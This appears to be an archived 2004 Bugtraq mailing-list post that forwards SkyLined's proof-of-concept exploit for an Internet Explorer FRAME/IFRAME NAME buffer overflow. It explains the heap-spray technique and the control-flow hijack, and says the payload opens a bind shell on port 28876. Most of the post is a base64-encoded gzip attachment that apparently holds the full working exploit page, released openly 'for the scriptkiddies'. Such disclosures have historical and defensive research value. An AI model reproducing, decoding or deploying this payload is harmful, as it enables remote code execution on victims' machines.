[37202] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

MSIE and <FRAME> tag NAME property bufferoverflow PoC</h2> <h4>daemon@ATHENA.MIT.EDU (Michal Zalewski)<br>Tue Nov 2 15:36:56 2004</h4> <pre>Date: Tue, 2 Nov 2004 10:19:34 +0100 (CET) From: Michal Zalewski <<A HREF="mailto:lcamtuf@coredump.cx">lcamtuf@coredump.cx</A>> To: <A HREF="mailto:bugtraq@securityfocus.com">bugtraq@securityfocus.com</A> Message-ID: <20041102101256.T7254@dekadens.coredump.cx> MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="----=_NextPart_000_0044_01C4C07D.1B558150" Content-ID: <20041102101256.E7254@dekadens.coredump.cx> This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. ------=_NextPart_000_0044_01C4C07D.1B558150 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: <20041102101256.J7254@dekadens.coredump.cx> A supposed PoC for a vulnerability discovered by ned of felinemenace.org over a week ago, using his Python port of my mangleme utility (the utility itself released some two weeks ago). I'm taking this opportunity to do some whoring because the author indicated that his original post bounced off BUGTRAQ due to "illegal" Content-Type of text/html. /mz ---------- Forwarded message ---------- Date: Tue, 2 Nov 2004 01:41:43 +0100 From: Berend-Jan Wever <skylined@edup.tudelft.nl> Subject: MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!)) Since nobody else posted an exploit I figured I might aswell slap the BoF together with my default exploit JavaScript for the scriptkiddies to rejoice and the sysadmins to worry about. <TECHNICAL> The JavaScript creates a large amount of heap-blocks filled with 0x0D byte nopslides followed by the shellcode. This is to make sure [0x0D0D0D0D] == 0x0D0D0D0D. It's not the most efficient thing in the world but it works like a charm for most IE bugs. The BoF sets eax to 0x0D0D0D0D after which this code gets executed: 7178EC02 8B08 MOV ECX, DWORD PTR [EAX] [0x0D0D0D0D] == 0x0D0D0D0D, so ecx = 0x0D0D0D0D. 7178EC04 68 847B7071 PUSH 71707B84 7178EC09 50 PUSH EAX 7178EC0A FF11 CALL NEAR DWORD PTR [ECX] Again [0x0D0D0D0D] == 0x0D0D0D0D, so we jump to 0x0D0D0D0D. We land inside one of the nopslide and slide on down to the shellcode. The shellcode is of the portbinding type, port 28876 to be exact. So now you know when to send me a happy birthday email... The exploit will work with the <FRAME> and <IFRAME> tag, attached file uses <IFRAME> </TECHNICAL> <DUMMIES> For all you guys that cannot setup their AV software right, you can download the attachment from one of the many mirrors of this list. </DUMMIES> Cheers, SkyLined ------=_NextPart_000_0044_01C4C07D.1B558150 Content-Type: APPLICATION/X-GUNZIP; NAME="InternetExploiter.html.gz" Content-Transfer-Encoding: BASE64 Content-ID: <20041102101528.X7254@dekadens.coredump.cx> Content-Description: Content-Disposition: ATTACHMENT; FILENAME="InternetExploiter.html.gz" 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 av53TkL5J/CMpRn6NAAA ------=_NextPart_000_0044_01C4C07D.1B558150-- </pre> <hr> <table border=0 cellspacing=0 cellpadding=1> <tr align=center valign=center> <td width=44><a href="/"><img src="/images/i-d.gif" alt="" width=40 height=40></a></td> <td width=44><a href="/help.html"><img src="/images/i-help.gif" alt="" width=40 height=40></a></td> <td width=44><a href="./?37202"><img src="/images/i-back.gif" alt="" width=40 height=40></a></td> <td width=44><a href="1"><img src="/images/i-first.gif" alt="" width=40 height=40></a></td> <td width=44><img src="/images/n-fref.gif" alt="" width=40 height=40></td> <td width=44><img src="/images/n-pref.gif" alt="" width=40 height=40></td> <td width=44><a href="37201"><img src="/images/i-prev.gif" alt="" width=40 height=40></a></td> <td width=44><a href="37203"><img src="/images/i-next.gif" alt="" width=40 height=40></a></td> <td width=44><img src="/images/n-nref.gif" alt="" width=40 height=40></td> <td width=44><img src="/images/n-lref.gif" alt="" width=40 height=40></td> <td width=44><a href="42493"><img src="/images/i-last.gif" alt="" width=40 height=40></a></td> <td width=44><img src="/images/n-post.gif" alt="" width=40 height=40></td> </tr><tr align=center valign=center><td><a href="/">home</a></td> <td><a href="/help.html">help</a></td> <td><a href="./?37202">back</a></td> <td><a href="1">first</a></td> <td>fref</td> <td>pref</td> <td><a href="37201">prev</a></td> <td><a href="37203">next</a></td> <td>nref</td> <td>lref</td> <td><a href="42493">last</a></td> <td>post</td> </tr></table> </body></html>